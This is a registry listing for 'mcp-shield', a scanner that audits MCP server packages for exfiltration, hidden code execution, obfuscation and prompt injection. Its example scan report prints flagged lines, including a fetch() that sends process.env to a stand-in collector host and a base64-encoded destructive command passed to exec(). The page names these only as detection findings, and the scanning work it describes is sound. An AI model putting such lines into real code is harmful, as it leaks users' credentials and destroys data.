A community-driven registry for the Claude Code ecosystem. Not affiliated with Anthropic.
Are you the author? Sign in to claim
Security scanner for MCP servers - detect backdoors, exfiltration, and prompt injection
A security scanner for MCP servers — detect backdoors, exfiltration, prompt injection, and supply chain risks before they reach your AI.
The MCP ecosystem is growing fast. Not every server on npm is safe. mcp-shield lets Claude audit any MCP server — local or from npm — before you trust it with your files, keys, and context.
| Category | Examples |
|---|---|
| Exfiltration | process.env sent over network, SSH key access, AWS credential reads |
| Code execution | eval(), new Function(), child_process.exec(), dynamic require() |
| Obfuscation | Base64 runtime decoding, hex-encoded payloads, char-code arrays |
| Sensitive file access | .env, id_rsa, browser cookies, ~/.gitconfig |
| Prompt injection | Hidden instructions, zero-width characters, role-switch attacks, jailbreak patterns |
| Supply chain | Package age, download count, maintainer count, CVEs in dependencies |
You: Scan the npm package "some-sketchy-mcp-server" before I install it
Claude (using scan_package):
## mcp-shield scan: some-sketchy-mcp-server
Verdict: DANGEROUS | Findings: 2 critical, 1 high
### Code Findings
#### index.js
- [CRITICAL] [EXF004] process.env sent over network — possible credential exfiltration (line 47)
fetch("https://collect.example.com/data", { body: JSON.stringify(process.env) })
- [CRITICAL] [OBF001] Base64 decode at runtime — decoded content not inspectable (line 12)
const cmd = Buffer.from("cm0gLXJm...", "base64").toString()
- [HIGH] [EXEC004] child_process exec/spawn — shell command execution (line 13)
exec(cmd)
### Supply Chain
| Published | 2 days ago |
| Downloads/wk | 3 |
| Trust Score | 15/100 — RISKY |
Flags:
- Package published less than 7 days ago
- Very low weekly downloads (<100)
| Tool | What it does |
|---|---|
scan_package | Download an npm MCP package and scan it for malicious patterns |
scan_directory | Scan a local MCP server directory (cloned from GitHub, etc.) |
check_prompt_injection | Check tool descriptions or responses for hidden injections |
audit_supply_chain | Get trust score, CVEs, maintainer count, and age for any npm package |
claude mcp add mcp-shield -- npx mcp-shield
npm install -g mcp-shield
claude mcp add mcp-shield -- mcp-shield
Add to ~/.claude/claude_mcp_config.json:
{
"mcpServers": {
"mcp-shield": {
"command": "npx",
"args": ["mcp-shield"]
}
}
}
"Scan the npm package 'xyz-mcp-server' before I install it"
"Scan the MCP server I cloned at ~/projects/some-mcp"
"Check this tool description for prompt injection: <paste text>"
"What's the trust score for 'popular-mcp-tool' on npm?"
"Audit all the MCP servers I have installed"
Static analysis — scans JavaScript/TypeScript source files with a library of regex patterns covering 20+ attack signatures across 5 categories.
Supply chain audit — queries the npm registry for package metadata, then runs npm audit to surface known CVEs in the dependency tree.
Prompt injection detection — checks tool descriptions and responses for zero-width characters, instruction overrides, role-switch attacks, and other LLM-targeting techniques.
--ignore-scripts installation — when scanning npm packages, installs with --ignore-scripts so no malicious postinstall hooks run during analysis.
PRs welcome. Detection patterns live in src/patterns.ts — adding new signatures is a single object.
git clone https://github.com/muhannad-hash/mcp-shield
cd mcp-shield
npm install
npm run dev
MIT
Run Claude Code as an MCP server so any agent can delegate coding tasks to it
Browser automation using accessibility snapshots instead of screenshots
English-first Korean equity intelligence MCP — DART filings, foreign-holder 5%-rule flows, activist filings, KRX news. F
Unity MCP acts as a bridge between AI assistants and your Unity Editor. Give your LLM tools to manage assets, control sc
